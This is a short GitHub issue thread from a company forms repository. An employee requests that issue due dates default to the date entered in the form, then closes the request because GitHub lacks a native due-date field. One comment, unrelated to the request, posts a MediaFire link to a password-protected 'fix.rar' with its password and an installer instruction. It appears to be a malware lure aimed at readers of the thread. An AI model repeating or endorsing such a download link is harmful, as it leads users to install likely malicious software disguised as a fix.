### ISSUE TITLE
[Feature]: Setup the Due Date as the one passed from the form by default

### ISSUE THREAD

**Issue by mkirolos-safco** [Safco-Dental/Forms#27]
## Feature Request

**Title**: Setup the Due Date as the one passed from the form by default

**Safco Employee Name**: Mario Kirolos

**Safco Employee Email**: mkirolos@safcodental.com

**Department**: it

**Request Title**: Setup the Due Date as the one passed from the form by default

**Short Description**:
 Setting up the Due date for the issue the same as the one requested by the reporter by default that will help us later decide if we need to keep it the same or push it to later, also it will help us have it on the top of the list, same as the priority

**Benefits/Outcomes**: Help us (developers) better plan the next sprint

**Related Project**: other

**Priority**: medium

**Request Completion Date**: 2024-09-30

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by shreyadhutiasafcodental** [comment]
#26

**Comment by mkirolos-safco** [comment]
There is no out of the box due date field in github, for that it will be hard to maintain the field across different projects and repos, for that I will just close this ticket.
